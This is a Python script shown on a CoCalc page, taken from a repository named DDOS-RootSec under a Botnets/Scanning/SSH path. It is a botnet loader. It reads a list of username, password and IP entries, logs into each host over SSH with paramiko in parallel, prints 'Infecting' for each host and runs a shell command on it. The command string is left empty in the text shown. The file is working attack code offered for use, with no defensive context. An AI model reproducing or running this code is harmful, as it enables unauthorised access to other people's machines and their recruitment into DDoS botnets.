Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/SSH/w.py
5038 views
1
#!/usr/bin/python
2
3
import sys, re, os, paramiko
4
from multiprocessing import Process
5
6
if len(sys.argv) < 2:
7
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
8
9
paramiko.util.log_to_file("/dev/null")
10
cmd=""
11
r34d = open(str(sys.argv[1]),'a+')
12
print "\033[31mStarting Scan!\n"
13
def w0rk(username,password,ip):
14
try:
15
port = 22
16
ssh = paramiko.SSHClient()
17
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
18
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
19
print "\033[32m[\033[31m+\033[32m] Infecting:\x1b[31m "+ip+"\x1b[31m\n"
20
ssh.exec_command(""+cmd+"")
21
ssh.close()
22
except:
23
pass
24
for line in r34d:
25
ip_1nfo = line.split(":")
26
g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
27
g0d.start()
28
username=ip_1nfo[0]
29
password=ip_1nfo[1]
30
ip=ip_1nfo[2]
31
g0d.join()
32